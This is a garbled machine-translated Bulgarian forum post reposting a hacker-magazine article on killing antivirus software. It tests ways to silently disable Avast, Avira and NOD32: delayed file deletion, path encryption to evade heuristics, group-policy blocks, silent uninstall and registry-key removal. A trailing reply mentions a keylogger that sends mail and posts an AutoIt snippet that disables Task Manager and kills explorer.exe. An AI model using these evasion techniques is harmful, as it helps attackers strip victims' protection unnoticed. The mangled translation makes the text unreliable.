Как да се убие антивирусна fuckav (Често задавани въпроси)
В тази статия, най-популярната xakep списание става ясно, че конвенционалните (а не всички) начини за самозащита с антивирусен софтуер не убива. Въпреки, че за Каспър, имам няколко пъти пробиха вируси, толкова много, така че преинсталацията не помага.
скрит текст
Crash тест антивирусен: тройно проникване: Nod32, Avast, Avira: Проверка на способността им да се справят стрес
В ролята на следващите експериментални актове Avast! Free Antivirus. Както подсказва името, програмата е напълно безплатна, така че натрупала доста популярност по целия свят. Неговите основни предимства са защита срещу руткитове в реално време, Avast технология! Интелигентен скенер, както и различни модули за защита, които разработчиците наричат "щитове" (поведение на борда, Shield P2P / IM, и т.н.).
За наскоро се присъедини припомни, че, както и начина, по който се тества. Така че, ние имаме са разработени пет ужасни изпитания. Някои изследвания са специално написани програма мен, а другият може да се извършва ръчно с помощта на стандартни инструменти на Windows. Всички експерименти са извършени в Windows XP Professional SP3 на. За преминаване всеки тест скала клас точка. В крайна сметка, ние се изчисли средноаритметичната стойност на всички резултати, и да видим кой е най-устойчиви.
Сега малко за самите тестове. Тъй като ние проведе краш-тестове, а след това на тестовете трябва да са подходящи. Тяхната основна цел - да забраните антивирусен софтуер, колкото е възможно прозрачно за потребителя. Ако в резултат на един или друг тест защитните функции на нашите "лабораторни проби" спре да работи, Antivir получава мазнини двойка. В противен случай ще гледам като на софтуера се справят с проблема. Ако имаше поне малко съобщение, преди смъртта му, той е честно спечелени най-малко три.
И няколко думи за всеки тест индивидуално. Първият тест ще бъде глупаво да се опита да премахне най-важните антивирусни бинарни файлове за дистрибуция. Но не е лесно да се премахне, както и премахване по време на зареждане с помощта на специален API-функции. Вторият ще направи същото, но умело шифроване на името на изтрити файлове с Antivir сте се досетили, че тя иска да изтрие от родната твърд диск. Третият тест отново ще изтрие важни файлове, но скрива този факт, прикриване на API-функцията летален край в съвсем безобиден код.
Четвъртият и петият тест се открояват, тъй като те ще се извършват с помощта на стандартни инструменти на Windows, без специални инструменти, ние няма да пиша. Разбира се, ако искате всичко може да се прилага в областта на софтуера. Така че, един от тестовете, няма да се стартира с помощта на политиката за сигурност на анти-вирус, а вторият ще се опита да деинсталирате софтуера, без много шум и прах.
И сега, когато всички детайли са предвидени, катастрофата тестове са готови за изстрелване и антивирусна трепереха от страх, тъй като първокурсник преди изпит, получават до забавлението.
тест №1
Първият тест ще бъде направено с помощта на специално написана полезност. В командния ред, ние ще дадем пълната си име на файла, което искаме да изтриете следващия обувка OS. Програмата ще се обадя на системата функция MoveFileEx; тази функция може да се движи на файлове и папки. Ако вторият параметър да премине NULL, а третият - знамето MOVEFILE_DELAY_UNTIL_REBOOT, пътя до файла, който трябва да бъде посочен в първия параметър на нашите прекрасни функции, той ще бъде изтрит завинаги след OS рестартиране. Програмният код е толкова просто, че тя ще се преодолее и най-безгрижни хакер.
Сега нека видим как ще оцелее нашата антивирусна. Ако се сблъскате с NOD32 и погледнете в диспечера на задачите, можете да видите два процеса: egui.exe и ekrn.exe. Първо започна с правата на текущия потребител, а втората - със система от привилегии. Ето им нещо, което ще се опита да се премахне. Стартирайте инструмента, за да се отстрани чрез определяне на търсения файл, и рестартирайте компютъра. След рестартирането, антивирусен успешно стартира. Pass, и пет, тъй като NOD32 е тих и спокоен опит да предотврати собственото си отстраняване от твърдия диск на потребителя на машината.
Но ние все още имаше две претенденти за титлата от най-стабилните. В случай на Avast ние ще атакува и avastsvc.exe avasrui.exe файловете, както и с Avira AntiVir - avgnt.exe, avguard.exe, avshadow.exe. В момента тече теста и направи рестартиране. И двата антивирусни като нов. И Avast и Avira усвоили в пет. Не са ненужни съобщения, принуждавайки потребителите да направят своя избор, без намек за неизправност. Всички успя да "отличен".
№2 тест
Вторият тест катастрофата почти напълно повтаря първия, но само с една разлика - по пътя за изтриване фал ние предава криптиран. Процедура за криптиране не е съвсем проста. Ние използваме специален трик, за да заблуди теста за антивирусна евристичен. Този трик е добре описана в предишната статия, така че се върна към него, ние няма да. Освен да кажа, че тя се основава на ключови алгоритъм за генериране на криптиране, които не могат да бъдат анализирани, евристични двигатели.
Разгледано в съда. Ние ще атакува всички едни и същи файлове, както на първия тест, преди шифроването с пълните си имена. NOD32 отново геройски издържа на атаката на своя exe'shniki. След рестартиране, то все още радва нас със своята прекрасна икона в системния трей. Но Avast! Free Antivirus и Avira AntiVir Personal, за съжаление. За съжаление, те са оцелели атаката. Всички пет. Това е отвратително.
№3 тест
Третият тест Също така е необходимо да се отстранят софтуерни файлове антивирусните, но това ще се прикрие факта, че се опитва да се премахне. За да направите това, когато се обадите на функцията ние MoveFileEx MOVEFILE_DELAY_UNTIL_REBOOT маска флаг, който красноречиво изразява нашите намерения. Disguise - или по-скоро, шифроването на този параметър ще се извършва с помощта на един и същи трик за генериране на ключ, който е устойчив на евристични методи.
изпитване за дълготрайност отново започна с NOD'a. Стартирайте инструмента за тест, не забравяйте предварително да укажете пътя до файловете, които трябва да бъдат изтрити от повърхността на диска. Ние натиснете бутона рестартирайте системата. Screen веднага потушен и се възпламенява. Система високоговорители тихо надникнем. Тичах линия натоварване на добрия стар Windows XP. И сега най-щастливи «Добре дошли» в приятен син фон ни казва, че няколко секунди по-късно научаваме какво се случи с NOD32. И нищо не се е случило с него. Тя работи като часовник. Но ние все още се надяват на Avast, или най-малко на Avira AntiVir.
За трети път По този вече добре позната работа, ние сме в очакване на багажника на OS. И това, което виждаме, ни хвърля в пълно отчаяние. И двамата, и Avast. и Avira, работа, сякаш нищо не се е случило. Дали това всички отново спечелени пет топки, а ние дори няма да зашлеви troechki жалък, да не говорим за голям и мазнини дяволите? Изглежда, че нашата катастрофа лаборатория, бавно, но сигурно отново класифицирани в салон за красота за котета. Един щастлив - има все още има тестове.
№4 тест
Следващият тест ще извършва със стандартни инструменти Windows XP Professional. За да направите това, изберете "Run в основната система на менюто. "И влиза до следното: gpedit.msc. Отворете конзолата Group Policy. Това е последвано от щракване върху елемент «Потребителска конфигурация», след това «Административен», «Система». След това в дясно виждаме «Не бягайте посочено Windows приложения». Тази опция ви позволява да се предотвратят някои програми, базирани на името на изпълнимия файл.
Той чака реда си, за NOD32.
В политиките на Windows ние предписват два изпълними файлове: egui.exe и ekrn.exe. Ако ние не ги накара отстранен, опитайте се да поне да им попречи да зарежда. След натискане на бутоните OK и рестартирайте компютъра си чакам търпеливо. OS вече е зареден, но иконата на антивирусна не се вижда. Чакай малко, може би това е просто спирачките. Въпреки това, нито една минута или две анти-вирус и не е започнал. Спечелване? Погледнете диспечера на задачите. За наше дълбоко съжаление, ekrn.exe процес е все още работи, но на потребителския интерфейс е много далече и не мирише. C клас. прекъснати Chain антивирусни победи.
Но нека не забравяме и за другия. Avast държеше по същия начин, както и NOD - започнете само системна услуга, но програмата за потребителското приложение не е започнало, това е, няма икона в системния трей и не показва никакви прозорци. Далеч наляво и Avira AntiVir. Картината е идентичен с предишните две. Всеки, който е три пъти. Нашата самочувствие бавно започва да расте, тъй като ние все още успява да пробие създаването на анти-вирус индустрия.
№5 тест
Петият ще се опита да се премахне напълно софтуера за сигурност с помощта на редовна инсталатор. Ние ще изтрие, така че потребителят не забеляза нищо. Почти всички съвременни средства за разполагане на приложения в системата, там са така наречените "тих режим", когато потребителят не е дал никакви допълнителни въпроси. Но с помощта на този режим и ние ще се извърши саботаж.
Разбира се, преди заместване него съответния GUID. Минута по-късно, компютърът ще се рестартира и от анти-вирус ще свърши. Словашкият антивирусна получава заслужаваше F, можете да не е толкова просто да се премахнат от системата!
За anynstalla Avast! Free Antivirus използва собствен модул. Той нарича това повече от странно:
C: \ Program Files \ ALWIL Software \ Avast5 \ aswRunDll.exe "C: \ Program Files \ ALWIL Software \ Avast5 \ Setup \ setiface.dll" RunSetup.
Всички наши опити да се движат по-тих режим се провалили. Но дори и ако ние бяхме в състояние да се скрие на програмата за отстраняване прозорец, а след това потребителят ще го види.
За такава бдителност Avast получава солидна топ пет. А какво да кажем Avira AntiVir Personal? Инсталаторът на този антивирусен също е домашно и няма законови средства премахване скрит режим, не можахме да намерим. Това е, като можете да поставите и Pyaterochka, но след Avast ръка да не се повишава - и тогава някой измисли как да започнете процеса на Private aninstalla? Ето защо предлагам да се постави Aviram chetverochku. С цел, следователно, се стремим към най-доброто.
№6 тест
Да, ние бяхме обещали общо пет тестове. Но твърде добри резултати антивирусен тест не ни позволяват да си почине, и решихме да им дадем още един тест. Сега ще търсим ключове в регистъра, които отговарят за старта на анти-вирус, и се опитват да ги премахнете.
NOD32, както и всички уважаващ себе си анти-вирус, се е разпространил своите пипала в цялата система. Разполага със собствен драйвер за наблюдение на места за достъп до файловата система и системния регистър на Windows. те постоянно течаща като услуга, която осигурява контрол на водача и модула за UI, който започва, когато се стартира операционната система и се използва за комуникация с потребителя. Всички тези компоненти са регистрирани в регистъра на системата. Например, услуги и драйвери живеят тук в този бранш: HKEY_LOCAL_MACHINE \ SYSTEM \ ControlSet001 \ Services \. Нека се опитаме да предотврати започването на ekrn.exe на услуги, отстраняване на подключ ekrn, който е в по-горе регистър клона. Щракнете върху бутона Del на клавиатурата и в отговор получаваме отрече мрачна Access. С водача е една и съща история. Но ние не се отчайвайте и се опитват да се прекъсне дори да започне UI части. За да направите това, отидете в HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run и да намерят възможност там, отговорен за стартирането egui.exe. Премахнато тази опция много добре и ние се радваме да рестартирате компютъра. След като се започне иконата в лентата OS NOD'a не се появи. Е постигнато, макар и с малки резерви. ESET NOD32 получава три.
Следваща в списъка - Avast. Всички важни параметри за стартиране се намират в същото положение като това на NOD'a. Но премахването на ключове, които отговарят за обслужване и водач започне да се провали. И, освен това, UI страна анти-вирус, ние също не успя да изключите Autorun. Avast получава пет.
завършени изследвания. Всички антивирусен софтуер, за наше съжаление, се е показана доста добре. Това беше най-добрият Avast! Free Antivirus набира 4.7 пункта. На второ място Avira AntiVir Personal - 4,2 точки. Усъвършенстването на списъка на ESET NOD32 с жалък резултат в 3.8 пункта. Съжалявам, съжалявам. Няма значение, следващия път, когато излезе с още по-нечовешки начин и се уверете, че да ги опознаят.
Сравнителна таблица на резултатите
файл: /tables/table_1.xls
Защо всички са се справили толкова добре?
Основната причина, поради която първите три тестови всички антивирусни станаха пет, се крие във факта, че те защитават своите файлове с едни и същи филтър драйвери на файловата система. Всички опити да пишат, да изтривате или променяте бинарни файлове, включени в антивирус силно подтиснати на ниво ядро, което предотвратява всякаква възможност за увреждане на работа антивирусни трети пръстен.
Същото е и с шестия теста. Вписванията за проследяване на водача просто забранява всякакви вредни действия срещу ключовете, които са свързани с антивирусен работа. Това се извършва също в операционната система на нула-пръстен, така че конвенционалните методи не могат да каша регистъра.
Е, какво по-добра сделка. Фактът, че успяхме да деинсталирате чисто популярна, а не безплатен антивирусен и лиши Guya няколко други много щастлив. В крайна сметка, всеки от тези продукти, които стоят зад няколко години еволюция, както и голям екип от програмисти, а интелектуален, които са работили неуморно, за да им защита. Фактът, че сме го управлява (защита) се вреди, а дори и такъв прост начин, може да се счита за добър резултат. Разработчиците антивирусна е нещо да се мисли за това, което и да подобри в следващите версии на своите продукти.
yuzayte скриптове, написани на AutoIt през него, можете да убие процеса в диспечера на задачите и той не го palitsya
антивирусен софтуер на това написах Keylogger е изпращане на поща и дисплей може да се направи Клаудия и мишка заключване
Добавен след 6 минути
скрит текст
#NoTrayIcon; разстояние иконата в лентата
$ Rw2 = RegWrite ( "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion Политики \ System \", "DisableTaskMgr", "REG_DWORD", "1"); Off диспечерски задачи
Run (@ComSpec "/ C" "Taskkill / F / IM explorer.exe", "", @SW_HIDE); отстраняване на диспечер explorer.exe задача
това е част от него
Antivir да бъде никой, и т.н.